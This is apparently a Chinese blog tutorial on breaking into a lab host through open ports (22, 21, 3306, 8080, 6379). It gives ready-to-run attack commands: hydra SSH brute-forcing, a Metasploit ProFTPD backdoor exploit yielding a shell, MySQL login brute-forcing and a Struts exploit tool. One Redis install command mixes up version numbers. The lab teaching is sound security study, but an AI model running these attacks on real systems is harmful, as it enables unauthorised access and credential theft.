常见的端口漏洞入侵主机

最新推荐文章于 2024-05-18 00:37:32 发布
最新推荐文章于 2024-05-18 00:37:32 发布
阅读量2.4w 收藏 310
点赞数 46
分类专栏: 渗透测试过程 文章标签: msf工具使用 21端口 22端口 3306端口 Struts漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44991517/article/details/90764955
版权

端口漏洞利用

当我们渗透一个网站时发现从网站渗透不进去的时候,就可以查看该网站主机开启了哪些端口,来从其开启的端口来进行入侵
一旦端口开放的话就可以从外部访问,操作系统都有或多或少的漏洞,特殊的请求或者指令触发之后就可以提升权限

实验环境

同一网段的两台主机:
入侵主机:kali
目标主机ip:192.168.31.69

使用kali和它本身自带的一些工具对受害主机进行入侵
先利用nmap对受害主机进行扫描查看其开启了哪些端口和服务
在这里插入图片描述

访问该ip发现80端口是一个phpinfo页面,无法利用80端口入侵
在这里插入图片描述

所以我们开始尝试从其他端口入侵该主机

22端口漏洞利用

发现其开启了22端口,22端口是SSH远程登录协议。最有可能利用的是弱口令的入侵。
使用kali自带hydra来进行暴力破解22端口
暴力破解ssh命令:

hydra -L /root/桌面/username.txt -P /root/桌面/password.txt -vV -o ssh.log -e ns -f 192.168.31.69 ssh

参数详解:
-L //暴力破解用户名字典
-P //暴力破解密码字典
-o ssh.log //输出到这个文件里
-vV //显示过程
-f //搜到账号密码就停止

在这里插入图片描述

经过一段时间的等待发现功夫不负有心人,还真破解出了22端口的登录账号密码
在这里插入图片描述

然后我们就可以使用破解出来的账号密码成功利用22端口远程登录主机并且发现是root权限
在这里插入图片描述

21端口漏洞利用

通过nmap扫描知道21端口开启的ftp版本是ProFTPD 1.3.3c,百度发现ProFTPD 1.3.3c有个后门命令执行漏洞
在这里插入图片描述

启动msfconsole
在这里插入图片描述

搜索ProFTPD 1.3.3c查看其漏洞模块

search ProFTPD 1.3.3c

在这里插入图片描述

切换到该漏洞模块下,并设置好目标ip

use exploit/unix/ftp/proftpd_133c_backdoor

set RHOSTS 192.168.31.69

run

在这里插入图片描述

成功反弹shell会话
在这里插入图片描述

3306端口漏洞利用

发现该主机还开启了3306端口,那么我们如何利用3306端口入侵目标主机呢?
3306端口是MySQL的默认端口,入侵者可以通过入侵3306端口来入侵我们的主机,在Metasploitable系统中,Mysql的身份认证存在漏洞,这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库
启动msfconsole
在这里插入图片描述
扫描mysql模块
msf5 > search mysql
在这里插入图片描述
选择MySQL可用模块,在模块中选择渗透工具模块进行攻击
这里我们切换到mysql扫描模块,设置模块有效选项
msf5 > use auxiliary/scanner/mysql/mysql_login

msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.31.69 #设置目标ip

txt5 auxiliary(scanner/mysql/mysql_login) > set USER_FILE /root/桌面/username.txt #设置用户名字典

txt5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/桌面/password.txt #设置密码字典

msf5 auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true #破解成功时停止

msf5 auxiliary(scanner/mysql/mysql_login) >run #开始爆破

成功爆破出MySQL用户名密码
在这里插入图片描述
利用爆破出的账号密码成功登录MySQL数据库
在这里插入图片描述

8080端口入侵

发现8080端口有一个网站Struts,百度发现Struts可以使用Struts Scan工具获得指定漏洞交互式shell

下载Struts Scan解压,并切换到struts-scan-master目录下
执行root@kali:~/桌面/struts-scan-master# python struts-scan.py
出现如下界面则安装成功
在这里插入图片描述
使用给出的指定漏洞交互shell执行payload
成功获得交互式shell
在这里插入图片描述

6379端口漏洞入侵

该主机还开启了6379端口,发现6379端口可以利用Redis未授权访问漏洞来入侵

在本地下载Redis并解压安装

wget http://download.redis.io/releases/redis-4.0.8.tar.gz
tar xzf redis-4.0.8.tar.gz
cd redis-3.2.0
make

在这里插入图片描述
修改配置文件,使可以远程访问
在bind 127.0.0.1前面加上#将其注释掉
把protected-mode后面的yes设为no
在这里插入图片描述
启动redis-server

./src/redis-server redis.conf

如果报错执行下列命令

cd /root/redis-4.0.8/src

在这里插入图片描述
然后连接redis发现成功连接
在这里插入图片描述

weixin_44991517
关注
  • 46
    点赞
  • 310
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
MySQL 小心3306端口
没有进步就是退步
08-12 1万+
接受这个项目的已经有一个月,但是在前几天,服务器上的项目突然跑不了,页面也时不时的刷新不出来,有时还直接提示服务器暂时不提供服务。后来检查发现是MySQL的原因(主要数据库也不是部署在这台服务器上,也不知道上个维护这个项目的师兄为什么要装,而且用户名密码居然是root,132465),由于MySQL 5.1.30以上版本的一个漏洞(当然是不是因为漏洞的原因,目前暂未知),导致一个后门程序会通过330
数据库漏洞(未授权访问+RCE)-Mysql+Hadoop
xiaoheizi的博客
07-09 738
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。如我们在安装使用mysq数据库时,默认情况下就会开启mysql服务和服务默认端口3306。启动漏洞环境,访问漏洞地址http://123.58.224.8:32561 即可看到Hadoop YARN ResourceManager WebUI页面。猜测可能存在Mysql 身份认证绕过漏洞,于是尝试复现漏洞漏洞利用:反弹shell。
Python 渗透测试:FTP 文件传输 爆破.(21端口
最新发布
网络安全领域___专研者.
05-18 644
文件传输是指在计算机网络中将数据从一个位置传输到另一个位置的过程。文件传输爆破是一种黑客攻击手段,主要针对文件传输系统的漏洞进行暴力破解.
windows,linux 实战渗透 主机常见端口漏洞
12-15 7891
主机常见端口漏洞
MySQL数据库渗透及漏洞利用总结
05-09 4183
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
网络安全之MySql攻击
FaceMarkMan的博客
01-09 1137
如果在 Windows 系统下的话应该就是最高权限了,执行一些 net user 增加用户的命令应该都是可以成功的现在文章思路慢慢变成了 MySQL 可操控文件怎么将这个危害扩大影响的问题了。可以往管理员桌面上写一个伪造的 CS 木马,如果对方 Office 有漏洞的话可以写入一个带后门的 word 文件,也可以篡改用户常执行的文件等 这样发散开来就变的很广了,国光这里不再一一叙述了,总之实际场景实际分析,大家在渗透的时候也可以多多思考更多的可能性,万一就成功了呢。
利用MS08067漏洞扫描445断口主机入侵(工具)
05-17
利用MS08067漏洞扫描445断口主机入侵(工具)
3306端口入侵【转】
weixin_34262482的博客
07-05 2655
这一节说一下3306端口,通过Mysql入侵服务器.  坦白的讲,我对mysql知道的太少,只是知它于mssql相对应的1433端口,它是3306。在w2k上它主要和是php组合,我一直学习的是asp+acess,没学习过mysql,也从来没有通过mysql成功入侵过服务器.为了使我的总结生一点光,全面一点,我这儿就转一篇文章,利用mssql入侵w2k服务器。全文如下,我加了一个图和一点...
看紧你的3306端口,一次通过mysql的入侵
zgqtxwd的专栏
05-01 2672
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
常见端口漏洞
weixin_30799995的博客
12-18 607
互联网中的各种服务一般都对应一个默认端口,有的服务可直接匿名访问服务,而有些可通过爆破用户名以及密码来获得管理员权限。 端口对应的服务以及漏洞存在方式----常见端口漏洞 21 FTP 匿名访问,弱口令 22 SSH 弱口令登录 23 Telnet 弱口令登录 80 Web 常见Web漏洞或后台登录弱口令 161 SN...
常用服务端口入侵方式
weixin_44277013的博客
07-27 581
常用服务端口入侵方式 FTP-21 FTP:文件传输协议,使用TCP端口20、21。20用于传输数据,21用于传输控制信息。 (1) ftp基础爆破: owasp的Bruter,hydra以及msf中的ftp爆破模块 (2) ftp匿名访问:用户名: anonymous密码:为空或者任意邮箱 (3) vsftpd后门: vsftpd 2到2.3.4版本存在后门漏洞,通过该漏洞获取root权限 (4)嗅探: ftp使用明文传输,使用Cain进行渗透。(但是嗅探需要在局域网并需要欺骗或监听网关) (5)
2010年最新利用135端口入侵网吧主机教程
03-06
2010年最新利用135端口入侵网吧主机教程 后续在给大家做个传马上线教程
弱口令超级扫描,可扫描3389,1433,2221端口并且爆破密码
04-23
弱口令超级扫描,可扫描3389,1433,2221端口并且爆破密码,效率快,准确率高 还支持C段,输入一个域名可以批量关联服务器,还能自动获取2级域名和旁站域名进行安全探测
s扫描器专扫端口漏洞
05-01
了解网络中的端口状态和漏洞情况,对于防止非法入侵至关重要。s扫描器的使用可以帮助用户提前发现并修复问题,降低被黑客利用的风险。此外,通过定期扫描,可以监测网络环境的变化,及时应对新出现的威胁。 4. **...
漏洞端口关闭135,137,139,445,3389.rar
08-13
本文将详细讨论标题和描述中提及的知识点,包括如何关闭常见漏洞端口,如135、137、139、445以及3389,以及为什么这些端口与勒索病毒和蠕虫攻击有关。 首先,让我们了解这些端口的作用: 1. **端口135**:这是...
用流光扫描主机漏洞
09-19
它主要用于检测网络上的主机和服务是否存在安全漏洞,是黑客和网络安全专家进行渗透测试时常用的工具之一。在本文中,我们将深入探讨流光的工作原理、功能特性以及如何正确使用它来扫描主机漏洞。 流光的核心功能...
国外最经典的端口扫描器Superscan4.rar
11-04
端口扫描是网络管理员和安全专家常用的一种技术,用于探测目标主机上开放的网络服务。在给定的压缩包文件“Superscan4.rar”中,我们找到了一个经典的端口扫描器工具——Superscan 4。这款工具不仅能够执行基本的...
Kali系统MSF模块暴力破解MySQL弱口令漏洞
dzqxwzoe的博客
02-26 1290
攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。
端口入侵mysql_看紧你的3306端口,一次通过mysql的入侵数据库教程 -电脑资料
weixin_30118919的博客
01-30 2886
mysql用superscan扫了一下某个c类的网段,寻找开放80端口的机器,结果就只有一台机器开放了80端口,试着连了一下,是我们学校某个社团的的主页,从端口的banner来看应该是apache(win32),证实一下telnet 211.87.xxx.xxxget(回车)501 MethodNot ImplementedMethod Not Implementedget to /index.h...
kali入侵139端口
09-23
入侵139端口是指通过利用139端口存在的漏洞,未经授权地获取目标计算机的访问权限。首先,需要使用扫描工具(如SUPERSCAN)扫描目标主机,确定是否存在139端口漏洞主机。一旦确定存在漏洞主机,可以使用命令"nbtstat -a IP"来获取目标主机的用户名和其他信息。然后,可以使用"开始-查找-计算机"的方式,输入刚才获取到的主机名,在对话框中选择查找,进而连接到目标主机。连接成功后,可以使用类似于网络邻居的方法来对目标主机进行操作。 然而,需要注意的是,IPC通道入侵是一种相对较老的攻击手段。现在针对IPC通道的防御手段也越来越多,越来越简单。为了保护计算机在IPC通道方面的安全,建议用户关闭Server服务、信使服务以及Task Scheduler服务(计划任务)。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值